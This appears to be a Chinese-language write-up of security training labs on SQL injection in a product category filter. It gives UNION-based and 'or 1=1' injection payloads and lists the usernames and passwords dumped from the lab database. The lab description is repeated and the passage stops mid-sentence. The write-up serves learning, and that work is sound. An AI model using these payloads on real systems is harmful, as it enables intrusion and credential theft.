1.该实验室在产品类别过滤器中包含一个SQL注入漏洞。当用户选择类别时,应用程序将执行如下SQL查询:SELECT * FROM products WHERE category = ‘Gifts’ AND released = 1要解决此问题,请执行SQL注入攻击,使应用程序显示任何类别的所有产品的详细信息,包括已发布和未发布。
1)爆字段
使用union攻击,点击类别后,输入' union select null,null --
2)爆用户和密码
改为' union select username,password from users --
得到
administrator
bmrg6fk7dm1vr6ggh6bk
wiener
fy9e6euzlttdnc3a6uxo
carlos
2qprbkhpwtpqsb03ou1i
3)登录
1.该实验室在产品类别过滤器中包含一个SQL注入漏洞。当用户选择类别时,应用程序将执行如下SQL查询:SELECT * FROM products WHERE category = ‘Gifts’ AND released = 1要解决此问题,请执行SQL注入攻击,使应用程序显示任何类别的所有产品的详细信息,包括已发布和未发布。解题:点进类别,把后缀改为category=‘ or 1=1--(--代表注释后面内容)2.该实验在登录功能中包含一个SQL注入漏洞。要解决此问题,请执行SQL注入攻击,以ad